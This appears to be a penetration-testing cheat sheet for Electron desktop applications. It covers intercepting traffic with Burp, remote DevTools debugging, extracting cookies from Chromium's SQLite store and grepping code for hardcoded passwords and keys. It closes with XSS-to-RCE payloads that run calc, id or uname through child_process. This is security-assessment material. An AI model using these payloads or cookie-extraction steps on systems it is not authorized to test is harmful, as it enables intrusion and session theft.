Electron / Atom Shell

Electron (formerly known as Atom Shell) is a software framework developed and maintained by GitHub for building desktop applications using JavaScript, HTML, and CSS. By embedding Chromium (browser engine) and Node.js (backend) into its binary, Electron allows to maintain one JavaScript codebase and create cross-platform apps that work on Windows, macOS, and Linux without native development. Additionally, it also uses various APIs to allow things such as native integration with Node services, and an Inter-process communication module.

Intercept HTTP requests

You need to add Burp’s certificate to the Windows Trust Store or to Mac OS’ Keychain. See Burp Suite.

Start Burp Suite to intercept requests.

Windows – Start the application using a proxy

ElectronApp.exe --proxy-server=127.0.0.1:8080

Mac OS – Start the application using a proxy

cd ElectronApp.app/Contents/MacOS
./ElectronApp --proxy-server=127.0.0.1:8080

Debugging with Chrome’s DevTools

ElectronApp.exe --remote-debugging-port=54321
  • Start Chrome and go to chrome://inspect
  • Under Devices, click Discover network targets -> Configure
  • Add localhost:54321 (no need to select Enable port forwarding) and click Done
  • Under Remote Targets, the application should appear
  • Click on Inspect

Find Electron version

In the DevTools, go to the Console tab. Check the Security Advisories that apply to the version.

navigator.userAgent
navigator.userAgent.match(/Electron\/([\d\.]+\d+)/)[1]

Cookies

Since Electron applications use Chromium, cookies are stored in:

Windows

C:\Users\<username>\AppData\Roaming\<app name>\Network\Cookies

Mac OS

/Users/<username>/Library/Application Support/<app name>/Cookies

Show cookies

This is a SQLite file. Transfer the file to Kali and extract the cookies.

sqlite3 Cookies "select name || ' = ' || value from cookies"

Show stack trace for warnings

ElectronApp.exe --trace-warnings

Sensitive Information

Look for hardcoded passwords or keys

grep -Ri "pass" ./
grep -Ri "key" ./

Known vulnerabilities

Identify known vulnerabilities in the project’s dependencies

npm i --package-lock-only
npm audit

XSS

XSS to RCE

Windows payloads

<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
<img src=x onerror=alert(require('child_process').exec('calc')); />

Linux & Mac OS payloads

<img src=x onerror="alert(require('child_process').execSync('gnome-calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('id').toString());"> 
<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">
<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">